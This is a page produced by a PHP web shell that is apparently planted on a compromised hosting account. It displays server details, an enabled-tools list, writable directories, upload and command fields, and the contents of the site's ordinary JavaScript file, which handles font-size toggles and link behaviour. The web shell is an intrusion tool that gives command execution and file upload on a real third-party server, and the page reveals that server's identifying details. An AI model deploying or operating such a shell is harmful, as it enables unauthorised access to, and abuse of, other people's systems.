- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 18.226.180.253
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/puertode/public_html/javascript/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/puertode/public_html/javascript/script_1.js
	
	//Javascript
	
	function normal (){
		document.getElementById('nota_interna').className = 'nota_chica';
	}
	function media (){
		document.getElementById('nota_interna').className = 'nota_media';
	}
	function mayor (){
		document.getElementById('nota_interna').className = 'nota_grande';
	}

	//Inicio de SesiĆ³n

   function SiFocus(element) {
     if (element.value == element.defaultValue) {
       element.value = '';
     }
   }
   function SiBlur(element) {
     if (element.value == '') {
       element.value = element.defaultValue;
     }
   }
   
// Ligas externas
	function initLinks() {
		for (i in document.links) {
			link = document.links[i];
			if (link.rel && link.rel.indexOf('external')!=-1) {
				link.onclick = onExternalLinkActivate;
				link.onkeypress = onExternalLinkActivate;
			}
		}
	}

	function onExternalLinkActivate() {
		window.open(this.href);
		return false;
	}

	window.onload = initLinks;
	
	

Youez - 2016 - github.com/yon3zu
LinuXploit